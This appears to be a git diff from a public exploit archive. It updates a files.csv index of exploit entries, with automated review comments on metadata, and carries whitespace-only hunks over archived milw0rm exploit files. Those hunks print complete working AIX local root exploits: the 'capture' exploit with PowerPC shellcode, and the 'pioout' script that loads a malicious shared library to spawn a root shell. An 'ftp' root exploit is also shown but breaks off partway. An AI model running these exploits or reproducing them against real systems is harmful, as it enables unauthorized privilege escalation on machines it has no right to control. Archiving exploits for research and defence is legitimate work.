17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0 24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0 30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0 34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0 34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
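Review bot: the 34606 row does more than the grammatical rename applied elsewhere in this commit: its description gains a version ("Webformatique Reservation Manager 2.4"). That is a metadata change, not a wording fix, and should be checked against the header of platforms/php/webapps/34606.txt before merging, since a wrong version in files.csv misdirects anyone searching the index by affected release.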
@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
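Review bot: the 35396 row (xEpan 1.0.4) correctly becomes "Multiple Vulnerabilities", but the author field "Parikesit , Kurawa" keeps a stray space before the comma on both sides; "Parikesit, Kurawa" would be the consistent form, and this row is already being edited.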
@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
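Review bot: the five appended rows match the header (id,file,description,date,author,platform,type,port), but the ids jump from 39565 to 39568; if 39566 and 39567 were withdrawn that is fine, otherwise their files under platforms/ are left unindexed. The port column is populated for the network-facing entries (443 for 39564 and 39568, 22 for 39569) and stays 0 for the local/dos entries, which is consistent with the rest of the file.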

@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/netpmon", args, envs ); execve( "/usr/bin/netpmon", args, envs );
return( 0 ); return( 0 );
} }
// milw0rm.com [2005-06-14] // milw0rm.com [2005-06-14]
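Review bot: both columns of this hunk, and of every file hunk that follows it, are identical, so the change is whitespace or line-ending only, most likely CRLF to LF normalization of the archived milw0rm files; confirm with `git diff --ignore-space-at-eol`, and consider splitting the whitespace churn into its own commit, separate from the files.csv update, so that the substantive change to the index stays reviewable.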

@ -95,6 +95,6 @@ int main()
execve( "/usr/sbin/ipl_varyon", args, envs ); execve( "/usr/sbin/ipl_varyon", args, envs );
return( 0 ); return( 0 );
} }
// milw0rm.com [2005-06-14] // milw0rm.com [2005-06-14]

@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/paginit", args, envs ); execve( "/usr/bin/paginit", args, envs );
return( 0 ); return( 0 );
} }
// milw0rm.com [2005-06-14] // milw0rm.com [2005-06-14]

@ -155,6 +155,6 @@ L=`expr $L + 144`
./a.out $L ./a.out $L
done done
/str0ke /str0ke
*/ */
// milw0rm.com [1997-05-27] // milw0rm.com [1997-05-27]

@ -156,6 +156,6 @@ do
echo $L echo $L
L=`expr $L + 42` L=`expr $L + 42`
./a.out $L ./a.out $L
done */ done */
// milw0rm.com [1997-05-26] // milw0rm.com [1997-05-26]

@ -1,178 +1,178 @@
/* 07/2007: public release /* 07/2007: public release
* IBM AIX <= 5.3 sp6 * IBM AIX <= 5.3 sp6
* *
* AIX capture Local Root Exploit * AIX capture Local Root Exploit
* By qaaz * By qaaz
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <fcntl.h> #include <fcntl.h>
#include <unistd.h> #include <unistd.h>
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/select.h> #include <sys/select.h>
#define TARGET "/usr/bin/capture" #define TARGET "/usr/bin/capture"
#define VALCNT 40 #define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y)) #define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) #define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] = unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60" "\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" "\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" "\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" "\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f" "\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d" "\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff" "\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40" "\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" "\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c" "\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8" "\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; "\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2]) void shell(int p1[2], int p2[2])
{ {
ssize_t n; ssize_t n;
fd_set rset; fd_set rset;
char buf[4096]; char buf[4096];
for (;;) { for (;;) {
FD_ZERO(&rset); FD_ZERO(&rset);
FD_SET(p1[0], &rset); FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset); FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1, n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL); &rset, NULL, NULL, NULL);
if (n < 0) { if (n < 0) {
perror("[-] select"); perror("[-] select");
break; break;
} }
if (FD_ISSET(p1[0], &rset)) { if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf)); n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break; if (n <= 0) break;
write(p1[1], buf, n); write(p1[1], buf, n);
} }
if (FD_ISSET(p2[0], &rset)) { if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf)); n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break; if (n <= 0) break;
write(p2[1], buf, n); write(p2[1], buf, n);
} }
} }
} }
/* just because you don't understand it doesn't mean it has to be wrong */ /* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{ {
ulong top, len, off; ulong top, len, off;
int i; int i;
len = 0; len = 0;
for (i = 0; argv[i]; i++) for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1; len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++) for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1; len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8); top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0; len = off = 0;
for (i = 0; args[i]; i++) for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1; len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) { for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4)) if (!strncmp(envs[i], "EGG=", 4))
off = len + 4; off = len + 4;
len += strlen(envs[i]) + 1; len += strlen(envs[i]) + 1;
} }
while (off & 3) while (off & 3)
strcat(envs[0], "X"), off++, len++; strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off; return top - ALIGN(len, 4) + off;
} }
int main(int argc, char *argv[], char *envp[]) int main(int argc, char *argv[], char *envp[])
{ {
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL }; char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL }; char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2]; int ptm, pts, pi[2];
pid_t child; pid_t child;
ulong addr; ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs); addr = get_addr(argv, envp, args, envs);
if (!envp[0]) { if (!envp[0]) {
dup2(3, 0); dup2(3, 0);
setuid(geteuid()); setuid(geteuid());
putenv("HISTFILE=/dev/null"); putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL); execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL); execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl"); perror("[-] execl");
exit(1); exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) { } else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch; char i, ch;
printf("\x1b["); printf("\x1b[");
for (i = 0; i < VALCNT; i++) for (i = 0; i < VALCNT; i++)
printf("%lu;", addr); printf("%lu;", addr);
printf("0A\n"); printf("0A\n");
fflush(stdout); fflush(stdout);
while (read(0, &ch, 1) == 1) while (read(0, &ch, 1) == 1)
write(1, &ch, 1); write(1, &ch, 1);
exit(0); exit(0);
} }
printf("--------------------------------\n"); printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n"); printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n"); printf(" By qaaz\n");
printf("--------------------------------\n"); printf("--------------------------------\n");
if (pipe(pi) < 0) { if (pipe(pi) < 0) {
perror("[-] pipe"); perror("[-] pipe");
exit(1); exit(1);
} }
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) { (pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty"); perror("[-] pty");
exit(1); exit(1);
} }
if ((child = fork()) < 0) { if ((child = fork()) < 0) {
perror("[-] fork"); perror("[-] fork");
exit(1); exit(1);
} }
if (child == 0) { if (child == 0) {
dup2(pts, 0); dup2(pts, 0);
dup2(pts, 1); dup2(pts, 1);
dup2(pts, 2); dup2(pts, 2);
dup2(pi[0], 3); dup2(pi[0], 3);
execve(TARGET, args, envs); execve(TARGET, args, envs);
perror("[-] execve"); perror("[-] execve");
exit(1); exit(1);
} }
close(pi[0]); close(pi[0]);
close(pts); close(pts);
sleep(1); sleep(1);
read(ptm, buf, sizeof(buf)); read(ptm, buf, sizeof(buf));
write(ptm, " ", 1); write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM); kill(child, SIGTERM);
waitpid(child, NULL, 0); waitpid(child, NULL, 0);
return 0; return 0;
} }
// milw0rm.com [2007-07-27] // milw0rm.com [2007-07-27]

@ -1,29 +1,29 @@
#!/bin/sh #!/bin/sh
# #
# 07/2007: public release # 07/2007: public release
# IBM AIX <= 5.3 sp6 # IBM AIX <= 5.3 sp6
# #
echo "-------------------------------" echo "-------------------------------"
echo " AIX pioout Local Root Exploit " echo " AIX pioout Local Root Exploit "
echo " By qaaz" echo " By qaaz"
echo "-------------------------------" echo "-------------------------------"
cat >piolib.c <<_EOF_ cat >piolib.c <<_EOF_
#include <stdlib.h> #include <stdlib.h>
#include <unistd.h> #include <unistd.h>
void init() __attribute__ ((constructor)); void init() __attribute__ ((constructor));
void init() void init()
{ {
seteuid(0); seteuid(0);
setuid(0); setuid(0);
putenv("HISTFILE=/dev/null"); putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0); execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0); execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl"); perror("execl");
exit(1); exit(1);
} }
_EOF_ _EOF_
gcc piolib.c -o piolib -shared -fPIC gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib [ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib rm -f piolib.c piolib
# milw0rm.com [2007-07-27] # milw0rm.com [2007-07-27]

@ -1,157 +1,157 @@
/* 07/2007: public release /* 07/2007: public release
* IBM AIX <= 5.3 sp6 * IBM AIX <= 5.3 sp6
* *
* AIX ftp Local Root Exploit * AIX ftp Local Root Exploit
* By qaaz * By qaaz
*/ */
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <unistd.h> #include <unistd.h>
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/select.h> #include <sys/select.h>
#define TARGET "/usr/bin/ftp" #define TARGET "/usr/bin/ftp"
#define OVERLEN 300 #define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y)) #define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) #define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] = unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60" "\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd" "\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" "\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" "\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" "\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f" "\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d" "\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff" "\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40" "\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" "\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c" "\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8" "\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; "\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2]) void shell(int p1[2], int p2[2])
{ {
ssize_t n; ssize_t n;
fd_set rset; fd_set rset;
char buf[4096]; char buf[4096];
for (;;) { for (;;) {
FD_ZERO(&rset); FD_ZERO(&rset);
FD_SET(p1[0], &rset); FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset); FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1, n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL); &rset, NULL, NULL, NULL);
if (n < 0) { if (n < 0) {
perror("[-] select"); perror("[-] select");
break; break;
} }
if (FD_ISSET(p1[0], &rset)) { if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf)); n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break; if (n <= 0) break;
write(p1[1], buf, n); write(p1[1], buf, n);
} }
if (FD_ISSET(p2[0], &rset)) { if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf)); n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break; if (n <= 0) break;
write(p2[1], buf, n); write(p2[1], buf, n);
} }
} }
} }
/* just because you don't understand it doesn't mean it has to be wrong */ /* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{ {
ulong top, len, off; ulong top, len, off;
int i; int i;
len = 0; len = 0;
for (i = 0; argv[i]; i++) for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1; len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++) for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1; len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8); top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0; len = off = 0;
for (i = 0; args[i]; i++) for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1; len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) { for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4)) if (!strncmp(envs[i], "EGG=", 4))
off = len + 4; off = len + 4;
len += strlen(envs[i]) + 1; len += strlen(envs[i]) + 1;
} }
while (off & 3) while (off & 3)
strcat(envs[0], "X"), off++, len++; strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off; return top - ALIGN(len, 4) + off;
} }
int main(int argc, char *argv[], char *envp[]) int main(int argc, char *argv[], char *envp[])
{ {
char pad[16] = "PAD=X", egg[512]; char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL }; char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL }; char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i; int pi[2], po[2], i;
pid_t child; pid_t child;
ulong addr; ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) { if (!envp[0]) {
